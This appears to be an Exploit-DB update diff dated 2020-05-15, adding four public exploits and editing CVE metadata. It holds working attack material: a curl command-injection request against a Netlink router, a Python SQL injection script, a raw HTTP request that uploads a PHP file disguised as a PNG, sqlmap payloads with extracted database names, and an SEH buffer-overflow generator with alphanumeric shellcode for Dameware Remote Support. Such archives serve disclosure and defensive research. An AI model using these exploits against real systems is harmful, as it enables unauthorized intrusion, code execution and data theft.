DB: 2020-05-15

6 changes to exploits/shellcodes

Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
Complaint Management System 1.0 - 'username' SQL Injection
Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
E-Commerce System 1.0 - Unauthenticated Remote Code Execution

exploits/hardware/webapps/48470.txt

@@ -0,0 +1,53 @@
+# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
+# Google Dork: Not applicable
+# Date: 2020-05-13
+# Exploit Author: Seecko Das
+# Vendor Homepage: https://www.crtindia.com/
+# Version: V3.3.0-190627
+# Tested on: Windows 10/Linux (Kali)
+# CVE: N/A
+
+Exploit :
+
+curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing
+ 
+
+Response :
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<!--ϵͳĬ<CDB3><C4AC>ģ<EFBFBD><C4A3>-->
+<html>
+<head>
+<title>PING<4E><47><EFBFBD>Խ<EFBFBD><D4BD></title>
+<meta http-equiv=pragma content=no-cache>
+<meta http-equiv=refresh content="2">
+<meta http-equiv=cache-control content="no-cache, must-revalidate">
+<meta http-equiv=content-type content="text/html; charset=gbk">
+<meta http-equiv=content-script-type content=text/javascript>
+<!--ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD>css-->
+<style type=text/css>
+@import url(/style/default.css);
+</style>
+<!--ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD>ű<EFBFBD>-->
+<script language="javascript" src="common.js"></script>
+</head>
+<!-------------------------------------------------------------------------------------->
+<!--<2D><>ҳ<EFBFBD><D2B3><EFBFBD><EFBFBD>-->
+<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000">
+ <blockquote>
+ <form>
+ <div align="left" style="padding-left:20px;"><br>
+	<div align="left"><b>Please wait</b>
+	<br><br>
+	</div>
+	<pre>
+boa.conf
+web
+	</pre>
+
+ <input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")>
+ </div>
+ </form>
+ </blockquote>
+</body>
+</html>

exploits/java/webapps/48459.txt

@@ -21,4 +21,4 @@
 - Payload: ```<script>alert('XSS')</script>```  
 - Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered.
 - Privileges: It requires admin account.
-- Location: Settings -> Users -> User Management -> Fields: "First Name" or "Last Name".CVE-2020-11808
+- Location: Settings -> Users -> User Management -> Fields: "First Name" or "Last Name".

exploits/java/webapps/48462.py

@@ -4,7 +4,7 @@
 # Vendor Homepage: https://www.tylertech.com/products/eagle
 # Version: 2018.3.11
 # Tested on: Windows 2012
-# CVE: N/A
+# CVE: CVE-2019-16112
 # Category: webapps
 #   
 # Eagle is a software written in Java by TylerTech.  Version 2018.3.11 allows an unauthenticated attacker to cause the software to deserialize untrusted data that can result in remote code execution.

exploits/php/webapps/48468.py

@@ -0,0 +1,41 @@
+# Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection
+# Exploit Author: Daniel Ortiz
+# Date: 2020-05-12
+# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
+# Tested on: XAMPP Version 5.6.40 / Windows 10
+# Software Link:  https://www.sourcecodester.com/php/14206/complaint-management-system.html
+
+#!/usr/bin/python
+
+import sys
+import requests
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)
+
+def main():
+    
+    target = sys.argv[1]
+    payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#"
+    url = "http://%s/cms/admin/index.php" % target
+    
+    print("[+] Target: %s") % target
+    print("[+] Injecting payload: %s") % payload
+
+    inject(url, payload)
+
+def inject(url, payload):
+
+    s = requests.Session()
+    d = {'username': payload, 'password': 'admin', 'submit': ''} 
+    r = s.post(url, data=d, proxies=proxy)
+
+
+if __name__ == '__main__':
+
+    if len(sys.argv) != 2:
+        print("(-) usage: %s  TARGET" % sys.argv[0])
+        print("(-) e.g: %s  192.168.0.10" % sys.argv[0]) 
+        sys.exit(-1)
+
+    main()

exploits/php/webapps/48471.txt

@@ -0,0 +1,100 @@
+# Exploit Title: E-Commerce System 1.0 - Unauthenticated Remote Code Execution
+# Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV)
+# Date: 2020-05-14
+# Vendor Homepage: https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ecommerce.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.5
+# Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection
+
+### Description: E-Commerce System Using PHP/MySQLi - Unauthenticated
+Remote Code Execution + Unauthenticated SQL Injection
+
+###POC 1: Unauthenticated Remote Code Execution via Unrestricted file upload
+
+Vulnerabilities url: http://thiennv.com/ecommerce/index.php?q=profile
+Exploitation:
+
+POST /ecommerce/customer/controller.php?action=photos HTTP/1.1
+Host: thiennv.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
+Gecko/20100101 Firefox/76.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------270177040916945863071313890828
+Content-Length: 4723
+Origin: http://thiennv.com
+Connection: close
+Referer: http://thiennv.com/ecommerce/index.php?q=profile
+Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5;
+_icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU;
+wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7
+Upgrade-Insecure-Requests: 1
+
+-----------------------------270177040916945863071313890828
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+1000000
+-----------------------------270177040916945863071313890828
+Content-Disposition: form-data; name="photo"; filename="logo1.php"
+Content-Type: image/png
+
+‰PNG
+
+
+IHDR   á   á   m"H   &PLTEÝ=1ÿÿÿ
+<?php phpinfo() ?>
+-----------------------------270177040916945863071313890828
+Content-Disposition: form-data; name="savephoto"
+
+
+-----------------------------270177040916945863071313890828--
+
+###POC 2: Unauthenticated SQL Injection
+
+Vulnerabilities url:
+http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854'
+Exploitation:
+
+Parameter: #1* (URI)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload:
+http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR
+6075=6075#
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
+OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT
+(ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
+AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 20 columns
+    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
+UNION ALL SELECT
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+---
+[11:22:17] [INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0 (MariaDB fork)
+[11:22:17] [INFO] fetching database names
+available databases [6]:
+[*] db_ecommerce
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+-------------------------------------------------------------------------------------------------------------Best
+Regards!
+(*Mr) Ngo Van Thien*

exploits/windows/local/48469.py

@@ -0,0 +1,61 @@
+# Exploit Title: Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
+# Exploit Author: gurbanli
+# Date: 2020-05-13
+# Vulnerable Software: Solarwinds Dameware Remote Support 12.1.1.273
+# Vendor Homepage: https://www.solarwinds.com/
+# Version: 12.1.1.273
+# Software Link: https://downloads.solarwinds.com/solarwinds/Release/DameWare/v12.1.1/DamewareRS-St.exe
+# Tested on: Windows 7 x86
+
+"""
+poc
+1. Run exploit and copy contents of payload.txt
+2. Open Dameware Remote Support
+3. Click Add active directory support
+4. Write any ip address in name or ip address field
+5. paste payload .txt content to display name field and click ok
+6. Click ok when error pops up
+7. Click Yes in dialog box
+8. calc pops up
+
+Actually, i cant create this exploit with reliable exit, that's why calculator will be executed in background lol :D . but it is not big issue, the main thing is that arbitary code is executed 
+"""
+
+
+file = open('payload.txt','w')
+
+max_length = 3604
+
+
+padding_until_eax = '\x6e\x41' * 57 + '\x6e'
+align_eax = (
+"\x41" # padding (one byte)
+"\x6e" # padding
+"\x05\x14\x11" # add eax,11001400
+"\x6e" # padding
+"\x2d\x13\x11" # sub eax,11001300
+)
+
+'''
+msfvenom -p windows/exec cmd=calc -f raw > shellcode.raw
+./alpha2 eax --unicode --uppercase < shellcode.raw
+'''
+
+shellcode = 'PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYXDBKPM0KPS0TIYUNQGPC4TKPPNPDK0RLLTK0RMDTKT2MXLO870JNF01KOFLOLQQSLLBNLMP7Q8OLMM1I7YRL22227DKR2LP4KOZOLTKPLLQRX9SQ8KQHQPQTKPYMPKQJ34KOYLXK3NZQ94KP44KKQXV01KOVLGQ8OLMKQ7WOHIPSEKFM3CML8OKSMMTRUK428DKPXMTM1HSC6TKLLPKTK0XMLKQYCTKKTTKM18PSYPDMTMT1KQK1QPYQJPQKOYPQO1O1J4KLRJKTM1MRJM1DMDEVRKPKPKPPPS8NQTK2OE7KOXUGKJPVUW2PVBH76EEGMUMKO9EOLKV3LLJCPKKK0RULEGKOWLS42RO1ZKPQCKOXUS3QQRL33KPA'
+
+
+
+'''
+ppr address 00b3007e (DNTU.exe)
+'''
+
+nSEH = '\x61\x6e' # unicode compatible padding
+SEH = '\x7e\xb3'
+
+payload = 'A' * 1764 + nSEH + SEH + align_eax + padding_until_eax + shellcode
+payload += 'A' * (max_length-len(payload))
+
+print('Payload length:{}'.format(len(payload)))
+
+file.write(payload)
+file.close()

files_exploits.csv

@@ -11071,6 +11071,7 @@ id,file,description,date,author,type,platform,port
 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
 48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows,
+48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows,
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
@@ -42697,3 +42698,6 @@ id,file,description,date,author,type,platform,port
 48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java,
 48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
+48468,exploits/php/webapps/48468.py,"Complaint Management System 1.0 - 'username' SQL Injection",2020-05-14,"Daniel Ortiz",webapps,php,
+48470,exploits/hardware/webapps/48470.txt,"Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution",2020-05-14,"Seecko Das",webapps,hardware,
+48471,exploits/php/webapps/48471.txt,"E-Commerce System 1.0 - Unauthenticated Remote Code Execution",2020-05-14,SunCSR,webapps,php,